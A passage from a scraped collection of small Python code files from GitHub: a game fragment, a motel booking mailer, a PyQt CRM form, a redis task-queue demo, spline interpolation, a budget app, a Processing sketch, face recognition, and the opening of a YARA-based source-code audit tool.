self.menu = []\n if selectionIndex == 0:\n X = 6\n Y = 9\n return self.actions({'area': \"Yaouw Volcano\",\n 'coordinates': (X, Y)})\n if \"Oukkar\" not in self.c.flags['Kills']:\n self.text = (\"Alpaca: Wehh...\" +\n \"\\nIt looks like there is transportation\" +\n \" conveniently waiting for you.\")\n self.menu = [\"Ride the alpaca up to the volcano.\"]\n elif \"Volcano Ointment\" in self.c.flags:\n self.text = \"Alpaca: Wehh...\"\n self.menu = [\"Ride the alpaca up to Yaouw Volcano.\"]\n return self.actions()\n","repo_name":"1bengardner/toshes-quest-ii","sub_path":"source/TUAAlbanianDesert.py","file_name":"TUAAlbanianDesert.py","file_ext":"py","file_size_in_byte":32219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"74343981390","text":"\"\"\"\nx = input(\"number 1\")\ny = input(\"number 2\")\n\ndef re_cap(x,y):\n if x>y:\n print(y,\"is smaller\")\n elif x\n \n ''' + si18n.translate('Name') + '''\n ''' + name + '''\n \n \n ''' + si18n.translate('Email') + '''\n ''' + email + '''\n \n \n ''' + si18n.translate('Message') + '''\n ''' + message + '''\n \n \n '''\n pass\n\n\ndef send_mails_for_new(booking):\n subject = 'Your booking request at Ferdinand Motel '\n # To client\n booking_info = build_booking_info(booking)\n (subject, body) = render_mail_template('new_client', booking_info)\n\n send_mail(\n si18n.translate('Ferdinand Motel') + '<' + get_sender() + '>',\n booking.user.full_name + '<' + booking.user.email + '>',\n subject,\n body)\n\n (subject, body) = render_mail_template('new_admin', booking_info)\n\n send_mail(\n si18n.translate('Ferdinand Motel') + '<' + get_sender() + '>',\n ', '.join(get_admin_mails()),\n subject,\n body)\n pass\n\n\ndef send_acceptance_mail(booking, mail_data):\n # To client\n message = mail.EmailMessage(\n sender=si18n.translate('Ferdinand Motel') +\n '<' + get_sender() + '>',\n subject=mail_data['subject']\n )\n\n message.to = booking.user.full_name + '<' + booking.user.email + '>'\n message.html = mail_data['body']\n message.send()\n\n\ndef build_booking_info(booking):\n bldr = BookingDictBuilder(booking)\\\n .with_user()\\\n .with_bookable()\n booking = bldr.bk\n bi = bldr.build()\n\n nights = (booking.end - booking.start).days\n\n bi['currencyClient'] = bi['currency']\n bi['priceClient'] =\\\n currency.convert(\n booking.price,\n bi['currency'],\n json.loads(booking.rates))\n bi['pricePerNightClient'] = math.ceil(bi['priceClient'] / nights)\n bi['priceClient'] = bi['pricePerNightClient'] * nights\n bi['nrOfNights'] = nights\n\n return bi\n\n\ndef render_mail_template(which, booking_info):\n key_base = 'mail.' + which + '.' + si18n.get_lang_id()\n subject_template = unicode(prop.get_all_props()[key_base + '.subject'])\n body_template = unicode(prop.get_all_props()[key_base + '.body'])\n\n return (\n render(subject_template, booking_info),\n render(body_template, booking_info)\n )\n\n\ndef render(string, booking_info):\n lang_id = si18n.get_lang_id()\n string = iterate_and_replace(string, 'user', booking_info['user'])\n string = iterate_and_replace(\n string,\n 'bookable.i18n',\n booking_info['bookable']['i18n'][lang_id])\n string = iterate_and_replace(string, 'bookable', booking_info['bookable'])\n string = iterate_and_replace(string, 'booking', booking_info)\n return string\n\n\ndef iterate_and_replace(string, base, dct):\n for k in dct:\n rk = r'#' + base + r'\\.' + k + r'\\b'\n string = re.sub(rk, unicode(dct[k]), string)\n return string\n\n\ndef send_mail(ffrom, to, subject, body, reply_to=''):\n message = mail.EmailMessage(sender=ffrom, subject=subject)\n message.to = to\n message.html = body\n if not reply_to == '':\n message.reply_to = reply_to\n message.send()\n\n\ndef get_sender():\n return 'albertmatyi@gmail.com'\n\n\ndef get_admin_mails():\n return [\n 'Developer ',\n ', Owner '\n ]\n","repo_name":"albertmatyi/motelferdinand","sub_path":"application/helpers/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"16816932714","text":"from PyQt5.QtWidgets import *\nfrom App.SQLite_Database import add_client_data, add_actions_data, nb_actions_data\nfrom datetime import datetime\n\n\nclass NewClient(QWidget):\n\n \"\"\"THE NewClient APPLICATION WINDOW.\n\n DISPLAY A WINDOW TO REGISTER ALL THE CLIENT INFORMATION AND SAVE IT IN THE SQL FILE data_clients AND\n IN THE MAIN SQL FILE FOR ALL THE ACTIONS EXECUTED\n\n REMARK : THE SQL FILE HAS TO BE CREATED BEFORE TO PROCESS, RUN THE FUNCTION FROM A DIFFERENT FILE IN THE FOLDER.\n YOU WILL FIND THE FUNCTION IN THE SQLite_Database.py.\n \"\"\"\n\n def __init__(self, Crm):\n super(NewClient, self).__init__()\n\n \"\"\"SET THE NewClient WINDOW AND Crm AS THE PARENT\"\"\"\n\n self.Crm = Crm\n\n self.setWindowTitle(\"ADD CLIENT\")\n\n self.grid = QGridLayout()\n self.setLayout(self.grid)\n\n self.home()\n\n def home(self):\n\n \"\"\"SET ALL THE WIDGETS OF THE NewClient WINDOW\"\"\"\n\n label_client_f_name = QLabel(\"Client first name:\", self)\n self.grid.addWidget(label_client_f_name, 0, 0)\n self.box_client_f_name = QLineEdit(self)\n self.grid.addWidget(self.box_client_f_name, 0, 1)\n\n label_client_l_name = QLabel(\"Client last name:\", self)\n self.grid.addWidget(label_client_l_name, 1, 0)\n self.box_client_l_name = QLineEdit(self)\n self.grid.addWidget(self.box_client_l_name, 1, 1)\n\n label_client_email = QLabel(\"Client email:\", self)\n self.grid.addWidget(label_client_email, 2, 0)\n self.box_client_email = QLineEdit(self)\n self.grid.addWidget(self.box_client_email, 2, 1)\n\n label_client_phone_mobile = QLabel(\"Client mobile phone:\", self)\n self.grid.addWidget(label_client_phone_mobile, 3, 0)\n self.box_client_phone_mobile = QLineEdit(self)\n self.grid.addWidget(self.box_client_phone_mobile, 3, 1)\n\n label_client_phone_home = QLabel(\"Client home phone:\", self)\n self.grid.addWidget(label_client_phone_home, 4, 0)\n self.box_client_phone_home = QLineEdit(self)\n self.grid.addWidget(self.box_client_phone_home, 4, 1)\n\n label_client_address = QLabel(\"Client address:\", self)\n self.grid.addWidget(label_client_address, 5, 0)\n\n label_client_address_country = QLabel(\"Country/Region:\", self)\n self.grid.addWidget(label_client_address_country, 6, 1)\n self.box_client_address_country = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_country, 6, 2)\n\n label_client_address_street = QLabel(\"Street address:\", self)\n self.grid.addWidget(label_client_address_street, 7, 1)\n self.box_client_address_street = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_street, 7, 2)\n\n label_client_address_city = QLabel(\"City:\", self)\n self.grid.addWidget(label_client_address_city, 8, 1)\n self.box_client_address_city = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_city, 8, 2)\n\n label_client_address_province = QLabel(\"Province/Territory:\", self)\n self.grid.addWidget(label_client_address_province, 9, 1)\n self.box_client_address_province = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_province, 9, 2)\n\n label_client_address_postal = QLabel(\"Postal code:\", self)\n self.grid.addWidget(label_client_address_postal, 10, 1)\n self.box_client_address_postal = QLineEdit(self)\n self.grid.addWidget(self.box_client_address_postal, 10, 2)\n\n label_client_option = QLabel(\"Client option:\", self)\n self.grid.addWidget(label_client_option, 11, 0)\n\n self.check_client_option_news_letter = QCheckBox(\"News letter\", self)\n self.grid.addWidget(self.check_client_option_news_letter, 11, 1)\n\n self.check_client_option_other = QCheckBox(\"Other\", self)\n self.grid.addWidget(self.check_client_option_other, 11, 2)\n\n self.btn_client_add = QPushButton(\"Add\", self)\n self.grid.addWidget(self.btn_client_add, 12, 0, 12, 3)\n self.btn_client_add.clicked.connect(self.btn_add_on)\n\n def btn_add_on(self):\n\n \"\"\"GET ALL THE DATA AND IMPLEMENT IT IN THE SQL FILE\"\"\"\n\n date = datetime.today()\n\n if self.check_client_option_news_letter.isChecked():\n news_letter = \"True\"\n else:\n news_letter = \"False\"\n\n if self.check_client_option_other.isChecked():\n option = \"True\"\n else:\n option = \"False\"\n\n choice = QMessageBox.question(self, \"Execute\", \"Do you want to add this client ?\",\n QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)\n\n if choice == QMessageBox.Yes:\n\n add_client_data(self.box_client_f_name.text().upper(),\n self.box_client_l_name.text().upper(),\n self.box_client_email.text().lower(),\n self.box_client_phone_mobile.text().upper(),\n self.box_client_phone_home.text().upper(),\n self.box_client_address_country.text().upper(),\n self.box_client_address_street.text().upper(),\n self.box_client_address_city.text().upper(),\n self.box_client_address_province.text().upper(),\n self.box_client_address_postal.text().upper(),\n news_letter,\n option)\n\n self.Crm.message_box.append(f\"The client {self.box_client_f_name.text().upper()} \"\n f\"{self.box_client_l_name.text().upper()} has been added the \"\n f\"{date}\")\n\n nb = nb_actions_data()\n\n add_actions_data(nb, \"CLIENT ADDED\", date, self.box_client_f_name.text().upper(), self.box_client_l_name.text().upper())\n\n else:\n pass\n\n","repo_name":"srevinU/CRM_Program_GUI_PyQt5_SQL_Data","sub_path":"A_Client.py","file_name":"A_Client.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"9781326318","text":"import redis\nimport time\n \nif __name__ == '__main__':\n print('web start to work')\n rcon = redis.StrictRedis(host='localhost', db=5)\n task_queue = 'task:prodcons:task_queue'\n result_queue = 'task:prodcons:result_queue'\n try:\n while True:\n str_time = time.asctime()\n codes = ['Aron', 'Bob', 'Mike', 'John', 'Ian']\n str_codes = ','.join(codes)\n rcon.rpush(task_queue, str_codes)\n print(\"Task create: {}, at {}\".format(str_codes, str_time))\n print('Now waiting crawler to feedback the data')\n start_time = time.time()\n codes_crawler_result = {}\n while start_time + 8 - time.time() > 0 :\n #time.sleep(20)\n code = rcon.blpop(result_queue, 1)\n if not code:\n continue\n code = code[1].decode('utf-8')\n codes_crawler_result[code] = rcon.get('ssxx_{}'.format(code))\n print(' Task Result from queue:', code , ' at ', time.asctime(), ' reulst is:', codes_crawler_result[code])\n if len(codes) == len(codes_crawler_result):\n print(' *All task result is OK now, break the while loop:', time.time() - start_time )\n break\n else:\n print(' ****only {} task result is ok: '.format(len(codes_crawler_result)), time.time() - start_time )\n \n except KeyboardInterrupt:\n pass\n \n \n \nimport redis\nimport time\nimport random\nimport asyncio\n\ntask_queue = 'task:prodcons:task_queue'\nresult_queue = 'task:prodcons:result_queue'\n \n#class Task(object):\n# def __init__(self):\n# self.rcon = redis.StrictRedis(host='localhost', db=5)\n# self.queue = 'task:prodcons:queue'\n# \n# def product_task(self):\n# while True:\n# str_time = time.asctime()\n# task = self.rcon.rpush(self.queue, str_time)\n# coffee_time = random.randint(1,20)\n# print(\"Task create: {}, and will have a coffee for {}s\".format(task, coffee_time))\n# time.sleep(coffee_time)\n#\n\nasync def crawler(code):\n coffee_time = random.randint(1,10)\n await asyncio.sleep(coffee_time)\n rcon.setex('ssxx_{}'.format(code), 5, '{} result at {}'.format(code, time.asctime()))\n #rcon.set('ssxx_{}'.format(code), '{} result at {}'.format(code, time.asctime()))\n rcon.rpush(result_queue, code)\n print('Task {} result at {}'.format(code, time.asctime()), \" it takes \", coffee_time, ' s')\n\ndef done_callback(futu):\n print('Done')\n \nif __name__ == '__main__':\n print('crawler start to work')\n rcon = redis.StrictRedis(host='localhost', db=5)\n loop = asyncio.get_event_loop()\n cnt_task = 0\n try:\n while True:\n str_time = time.asctime()\n codes = rcon.blpop(task_queue, 1)\n if not codes:\n continue\n codes = codes[1].decode('utf-8').split(',')\n print('##Task from queue:', codes , ' at ', str_time)\n #tasks = [ crawler(code) for code in codes ]\n #loop.run_until_complete(crawler('1'))\n #futu = asyncio.ensure_future(crawler('1'))\n #futu.add_done_callback(done_callback)\n \n #loop.run_until_complete(futu)\n tasks = []\n for code in codes:\n futu = asyncio.ensure_future(crawler(code))\n futu.add_done_callback(done_callback)\n tasks.append(futu)\n loop.run_until_complete(asyncio.gather(*tasks))\n \n cnt_task = cnt_task + 1\n print(\"##All task done. {}\".format(cnt_task))\n except KeyboardInterrupt:\n pass\n","repo_name":"mistakeking/gitskills","sub_path":"test_asynoio.py","file_name":"test_asynoio.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"44062296275","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef makeHValues(dataX):\n size = len(dataX)-1\n result = np.zeros(size)\n for i in range(0,size):\n result[i] = (dataX[i+1]-dataX[i])\n return np.array(result)\n\ndef makeGammaVector(dataY,dataH):\n size = len(dataY)-2\n result = np.zeros(size+2)\n for i in range(0,size):\n result[i] = (dataY[i+2] - dataY[i+1])/dataH[i+1] - (dataY[i+1]-dataY[i])/dataH[i]\n return result\n\ndef makeMatrix(dataX, dataY, dataH):\n size = len(dataX)\n result = np.zeros((size, size))\n # điều kiện ma trận\n for i in range(0,size-2):\n result[i,i] = dataH[i]/6\n result[i,i+1] = (dataH[i]+dataH[i+1])/3\n result[i,i+2] = dataH[i+1]/6 \n return result\n\ndef naturalSpline(matrix, h_vector ,gamma_vector, dataY):\n matrix[-2,0] = 1\n gamma_vector[-2] = 0\n matrix[-1,-1] = 1\n gamma_vector[-1] = 0\n\ndef calculateCubic(a,b,c,d,x):\n return d+x*(c+x*(b+x*a))\n\ndef makeAllCubicFunctions(dataX, dataY, dataH, alphas):\n all_splines = []\n for k in range (0,len(alphas)-1):\n a = (alphas[k+1] - alphas[k])/(6*dataH[k])\n b = (3*alphas[k]*dataX[k+1]-3*alphas[k+1]*dataX[k])/(6*dataH[k])\n c = (-3*alphas[k]*dataX[k+1]**2+3*alphas[k+1]*dataX[k]**2)/(6*dataH[k]) + (dataY[k+1]-dataY[k])/dataH[k] - (alphas[k+1]-alphas[k])*dataH[k]/6\n d = (alphas[k]*dataX[k+1]**3 - alphas[k+1]*dataX[k]**3)/(6*dataH[k]) + (dataY[k]*dataX[k+1]-dataY[k+1]*dataX[k])/dataH[k] + (alphas[k+1]*dataX[k]-alphas[k]*dataX[k+1])*dataH[k]/6\n all_splines.append((a,b,c,d))\n return all_splines\n\n# Create \"Natural Spline\", return its coef, start point and end point of the polynomial.\ndef mainNaturalCubicSpline(dataX, dataY):\n dataH = makeHValues(dataX)\n gamma_vector = makeGammaVector(dataY,dataH)\n gamma_vector = np.transpose(np.array(gamma_vector))\n matrix = makeMatrix(dataX,dataY,dataH)\n naturalSpline(matrix, dataH,gamma_vector,dataY)\n print(matrix)\n print(gamma_vector)\n alphas = np.matmul(np.linalg.inv(matrix),gamma_vector)\n all_splines = makeAllCubicFunctions(dataX,dataY,dataH,alphas)\n return all_splines\n\n# Draw cubic spline in graph\ndef plotCubicSpline(dataX, dataY, all_cubic_polynomials):\n plt.scatter(dataX,dataY)\n for i in range(0,len(dataX)-1):\n a,b,c,d = all_cubic_polynomials[i]\n dataX_i = np.linspace(dataX[i], dataX[i+1],11)\n dataY_i = [calculateCubic(a,b,c,d,x) for x in dataX_i]\n plt.plot(dataX_i,dataY_i)\n plt.show()\n\n# Calculate point value on the cubic spline.\ndef calculateCubicSplineAtPoint(all_cubic_polynomials, x):\n for ((a,b,c,d), start, end) in all_cubic_polynomials:\n if(start < x and end > x ):\n return calculateCubic(a,b,c,d,x)\n return all_cubic_polynomials \n\n# Return a lambda, that will ensure root finding.\ndef getCubicSpline(all_cubic_polynomials):\n return lambda x : calculateCubicSplineAtPoint(all_cubic_polynomials, x)\n\n","repo_name":"manh354/PhuongPhapSoNew","sub_path":"src/interpolation/spline.py","file_name":"spline.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"35143760059","text":"class Budget:\n '''This is a budget app'''\n\n def __init__(self, name, size):\n self.budget_name = name\n self.budget_size = size\n\n def deposit(self):\n print(f'How much would you like to add to the budget of {self.budget_size}? \\n')\n dep_funds = int(input())\n print(f'Do you want to approve the deposit of {dep_funds}? \\n')\n print('Press 1 to approve and 2 to cancel')\n auth = int(input())\n while not auth:\n if auth == 1:\n auth == True\n print('Deposit approved!')\n if auth == 2:\n auth == True\n print('Cancelled!')\n else:\n print('Invalid Selection')\n break\n\n def withdraw(self):\n # Withdraw funds from any of the budget categories\n print('How much would you like to withdraw? \\n')\n amt_withdraw = int(input())\n print('What category do you want to withdraw from? \\n')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n cat_withdraw = int(input())\n\n if amt_withdraw <= budget_1.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_2.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_3.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_4.budget_size:\n print('Successful')\n self.homepage(self)\n elif amt_withdraw <= budget_5.budget_size:\n print('Successful')\n self.homepage(self)\n else:\n print('Insufficient funds in target category')\n self.homepage(self)\n\n\n def balance(self):\n # Return balance for any budget category when called in respect to that category\n print('What budget category would you want to see balance left \\n')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n bal_category = int(input())\n if bal_category == 1:\n return budget_1.budget_size\n elif bal_category == 2:\n return budget_2.budget_size\n elif bal_category == 3:\n return budget_3.budget_size\n elif bal_category == 4:\n return budget_4.budget_size\n elif bal_category == 5:\n return budget_5.budget_size\n else:\n pass\n\n def transfer(self):\n # Transfer funds between different categories and return balances\n print('How much would you like to transfer? \\n')\n amt_transfer = int(input())\n print('What budget category would you like to transfer to?')\n print('1. Food 2. Clothing 3. Data 4. Entertainment 5. Healthcare \\n')\n cat_transfer = int(input())\n if cat_transfer == 1:\n amt_transfer + budget_1.budget_size\n return\n elif cat_transfer == 2:\n amt_transfer + budget_2.budget_size\n return\n elif cat_transfer == 3:\n amt_transfer + budget_3.budget_size\n return\n elif cat_transfer == 4:\n amt_transfer + budget_4.budget_size\n return\n elif cat_transfer == 5:\n amt_transfer + budget_5.budget_size\n return\n else:\n print('Invalid selection!')\n self.transfer(self)\n\n def homepage(self):\n # Acts aas the reception from where different methods can be called based on inputs\n print('Welcome, what would you like to do?')\n print('Press 1. To Withdraw \\n Press 2. To deposit \\n Press 3. For Budget balance \\n Press 4. To Transfer \\n')\n home_options = int(input())\n if home_options == 1:\n self.withdraw(self)\n elif home_options == 2:\n self.deposit(self)\n elif home_options == 3:\n self.balance(self)\n elif home_options == 4:\n self.transfer(self)\n else:\n print('Invalid selection, Try again')\n\n\nbudget_1 = Budget('Food', 20000)\nbudget_2 = Budget('Clothing', 10000)\nbudget_3 = Budget('Data', 8000)\nbudget_4 = Budget('Entertainment', 6000)\nbudget_5 = Budget('Healthcare', 5000)\n\n################### BUDGET APP ##############################\n\n\n","repo_name":"0diin/Zuri_tasks","sub_path":"Budget2.py","file_name":"Budget2.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41623870531","text":"\"\"\"\nTexture Quad.\n\nLoad an image and draw it onto a quad. The texture() function sets\nthe texture image. The vertex() function maps the image to the geometry.\n\"\"\"\n\nhalfWidth = None\nhalfHeight = None\nimg = None\n\n\ndef setup():\n global img, halfWidth, halfHeight\n size(640, 360, P3D)\n halfWidth = width / 2.0\n halfHeight = height / 2.0\n img = loadImage(\"berlin-1.jpg\")\n noStroke()\n\n\ndef draw():\n background(0)\n\n translate(halfWidth, halfHeight)\n rotateY(map(mouseX, 0, width, -PI, PI))\n rotateZ(PI / 6)\n\n with beginShape():\n texture(img)\n vertex(-100, -100, 0, 0, 0)\n vertex(100, -100, 0, img.width, 0)\n vertex(100, 100, 0, img.width, img.height)\n vertex(-100, 100, 0, 0, img.height)\n","repo_name":"jdf/processing.py","sub_path":"mode/examples/Topics/Textures/TextureQuad/TextureQuad.pyde","file_name":"TextureQuad.pyde","file_ext":"pyde","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1589,"dataset":"github-code","pt":"83"} +{"seq_id":"1760453869","text":"import face_recognition\r\nimport imutils\r\nimport pickle\r\nimport time\r\nimport cv2\r\nimport os\r\n\r\nimport numpy as np\r\n \r\n\r\ncascPathface = os.path.dirname(\r\n cv2.__file__) + \"/data/haarcascade_frontalface_alt2.xml\"\r\n\r\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt_tree.xml\")\r\n\r\ndata = pickle.loads(open('face_enc', \"rb\").read())\r\n\r\nprint(data)\r\n\r\nimage = cv2.imread('face.jpg')\r\n\r\nrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\nfaces = faceCascade.detectMultiScale(gray,\r\n scaleFactor=1.1,\r\n minNeighbors=4,\r\n minSize=(60, 60),\r\n )\r\nprint(faces)\r\n\r\nencodings = face_recognition.face_encodings(rgb)\r\nnames = []\r\nfiltered_faces =[]\r\n\r\nfor encoding in encodings:\r\n\r\n best =10000\r\n name = 'none'\r\n \r\n\r\n matches = face_recognition.compare_faces(data[\"encodings\"],\r\n encoding)\r\n\r\n print(f' matches {matches}')\r\n if True in matches :\r\n\r\n matchedIdxs = [i for (i, b) in enumerate(matches) if b]\r\n print(f' matched indses {matchedIdxs}')\r\n counts = {}\r\n\r\n f = ''\r\n for i in matchedIdxs:\r\n\r\n name = data[\"names\"][matchedIdxs[0]]\r\n\r\n counts[name] = counts.get(name, 0) + 1\r\n\r\n name = max(counts, key=counts.get)\r\n\r\n name = data[\"names\"][matchedIdxs.index(i)]\r\n\r\n names.append(name)\r\n\r\n for ((x, y, w, h), name) in zip(faces, names):\r\n\r\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n cv2.putText(image, name, (x, y), cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.75, (0, 255, 0), 2)\r\n print(f' data {data[\"names\"]}')\r\n\r\ncv2.imshow(\"Frame\", image)\r\ncv2.waitKey(0)","repo_name":"MustafaMetwally4/Expert-Sestem-Project-Face_Recognation-","sub_path":"FaceRecognition.py","file_name":"FaceRecognition.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30599645198","text":"#!/usr/bin/python3\n\nfrom optparse import OptionParser\nfrom optparse import OptionGroup\nimport os\nimport json \nimport re\nimport importlib\nimport yara \nimport os\nimport logging, sys\n\nlogging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n\n#relative path\ntonbi_dir = os.path.dirname(__file__)\nframework_dir = os.path.join(tonbi_dir, 'framework')\nlanguage_dir = os.path.join(tonbi_dir, 'language')\nview_dir = os.path.join(tonbi_dir, 'view')\nplugin_dir = os.path.join(tonbi_dir, 'plugin')\n\n#default 3+3, 6lines will show you\nDEFAULT_LINES = 3 \n#one line can't limit 500 ascii characters\nLIMIT_LINE_LEN = 1024 \n#basic ignore image files \nDEFAULT_IGNORE = [ \"jpg\", \"png\", \"jpeg\", \"ico\", \"gif\", \"tif\" , \"tiff\", \"bmp\" ] \n#default knowledge based database file \nKBDB_FILE = \"kbdb.json\"\nYARA_EXT = \"yar\"\n\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# debug_print() will be deprecated \ndef debug_print(str):\n\tif config.debug_mode : \n\t\tprint('DEBUG: ', str) \n\n\nclass Config : \n\tdebug_mode = False \n\tconfig_file =\"\"\n\tsource_directory = \"\"\n\tframework_name = \"\"\n\tview_name = \"\" \n\tlanguage = \"\"\n\thead_count = DEFAULT_LINES \n\ttail_count = DEFAULT_LINES \n\toutput = \"\"\n\tplugins = []\n\tignore_files = [] \n\tignore_dirs = [] \n\texclude = [] \n\n\nclass Plugin:\n\tdic = dict()\n\tobjs = dict() \n'''\nclass MyPlugin :\n def init(self):\n # firstly loaded \n def audit(self, line, lines, output):\n # called by every line \n def finish(self)\n # please clear all resource \n'''\n\n\nclass Kbdb :\n\tdic = \"\" \n\nclass Yara : \n\tframework_rules = \"\" \n\tlanguage_rules = \"\"\n\tview_rules = \"\" \n\nclass Output :\n\tlist = [] \n\nclass AuditItem:\n\toutput = \"\"\n\tlines = \"\"\n\tline = \"\"\n\ti = 0 \n\tfilename = \"\" \n\n\nconfig = Config() \nkbdb = Kbdb() \nplugin = Plugin() \noutput = Output()\nmyyara = Yara() \n\n\n# create logger\nlogger = logging.getLogger('tonbi')\nlogger.setLevel(logging.WARNING)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n#logger.debug('debug message')\n\n\ndef prepare_output():\n\tif(config.output):\n\t\tif( os.path.exists( config.output)):\n\t\t\tos.remove(config.output)\n\n\ndef check_config():\n\tprint(\"check configuration...\")\n\ttry:\n\t\tos.stat(config.source_directory)\n\texcept :\n\t\tprint(\"source directory not found : \", config.source_directory)\n\t\texit()\n\n\ttry : \n\t\trulefile = config.framework_name + \".\" + YARA_EXT\n\t\tfilename = os.path.join(framework_dir, rulefile)\n\t\tos.stat(filename)\n\texcept:\n\t\tprint(\"framework not found : \", config.framework_name)\n\t\texit()\n\t\n\ttry : \n\t\trulefile = config.language + \".\" + YARA_EXT\n\t\tfilename = os.path.join(language_dir, rulefile)\n\t\tos.stat(filename) \n\texcept:\n\t\tprint(\"language not found : \", config.language )\n\t\texit()\n\n\n\tif config.view_name : \n\t\ttry:\n\t\t\trulefile = config.view_name + \".\" + YARA_EXT\n\t\t\tfilename = os.path.join(view_dir, rulefile)\n\t\t\tos.stat(filename)\n\t\texcept: \n\t\t\tprint(\"view not found : \", config.view_name)\n\t\t\texit()\n\n\tif config.plugins : \n\t\tfor p in config.plugins :\n\t\t\tif p : \n\t\t\t\tpluginfile = p + \".py\"\n\t\t\t\tplugindir = os.path.join(plugin_dir, p)\n\t\t\t\tplugin_filename = os.path.join(plugindir, pluginfile)\n\t\t\t\ttry : \n\t\t\t\t\tos.stat(plugin_filename) \n\t\t\t\texcept:\n\t\t\t\t\tprint(\"plugin not found : \", p)\n\t\t\t\t\texit()\n\t\t\t\n\ndef load_config():\n\tprint(\"load config setting \")\n\twith open ( config.config_file ) as f:\n\t\tconfig_dic = json.load(f)\n\t\tlogger.debug('config_dic(json): %r', config_dic) \n\t\t\n\t\t# TODO set config dic \n\t\tif( \"source_directory\" in config_dic ):\n\t\t\tconfig.source_directory = config_dic[\"source_directory\"] \n\n\t\tif(\"framework_name\" in config_dic ):\n\t\t\tconfig.framework_name = config_dic[\"framework_name\"] \n\n\t\tif(\"language\" in config_dic):\n\t\t\tconfig.language = config_dic[\"language\"]\n\n\t\tif(\"head_count\" in config_dic) :\n\t\t\tconfig.head_count = config_dic[\"head_count\"] \n\t\t\n\t\tif(\"tail_count\" in config_dic):\n\t\t\tconfig.tail_count = config_dic[\"tail_count\"] \n\t\t\n\t\tif(\"ignore_files\" in config_dic):\n\t\t\tconfig.ignore_files = config_dic[\"ignore_files\"]\n\n\t\tif(\"view_name\" in config_dic) :\n\t\t\tconfig.view_name = config_dic[\"view_name\"] \n\n\t\tif(\"output\" in config_dic):\n\t\t\tconfig.output = config_dic[\"output\"] \n\t\t\n\t\tif(\"plugins\" in config_dic ):\n\t\t\tconfig.plugins = config_dic[\"plugins\"] \n\t\t\n\t\tif(\"ignore_dirs\" in config_dic):\n\t\t\tconfig.ignore_dirs = config_dic[\"ignore_dirs\"]\n\n\t\tif(\"exclude\" in config_dic):\n\t\t\tconfig.exclude = config_dic[\"exclude\"]\n\n\tlogger.debug(\"config(class): %s\", config)\n\t\n \ndef kbdb_load_framework() :\n\tprint (\"load framework ...\" )\n\tfilename = \"./framework/\" + config.framework_name + \"/\" + KBDB_FILE\n\twith open( filename ) as f : \n\t\tkbdb.dic = json.load(f) \n\t\tlogger.debug(kbdb.dic) \n\n \ndef yara_load_framework() :\n\tprint (\"load framework ...\" )\n\trulefile = config.framework_name + \".\" + YARA_EXT\n\tfilename = os.path.join(framework_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.framework_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('framework_rules: %r', myyara.framework_rules) \n\ndef yara_load_language() :\n\tprint (\"load language ...\" )\n\trulefile = config.language + \".\" + YARA_EXT\n\tfilename = os.path.join(language_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.language_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('language_rules: %r', myyara.language_rules) \n\ndef yara_load_view() :\n\tif config.view_name == \"\" :\n\t\treturn \n\t\t\n\tprint (\"load view ...\" )\n\trulefile = config.view_name + \".\" + YARA_EXT\n\tfilename = os.path.join(view_dir, rulefile)\n\twith open( filename ) as f : \n\t\tmyyara.view_rules = yara.compile(filepath=filename)\n\t\tlogger.debug('view_rules: %r', myyara.view_rules) \n\n\ndef kbdb_add_vulnerability(filename, lines, item, match):\n\tvulnerability = \"\"\n\tvulnerability += \"==================================================\\n\" \n\tvulnerability += \"vulnerability : \" + item[\"vulnerability\"] + \"\\n\" \n\tvulnerability += \"description : \" + item[\"description\"] + \"\\n\" \n\tif (config.debug_mode):\n\t\tvulnerability += \"vulnerability : \" + match[0] + \"\\n\" \n\tvulnerability += \"reference : \" + item[\"reference\"] + \"\\n\" \n\tvulnerability += \"filename : \" + filename + 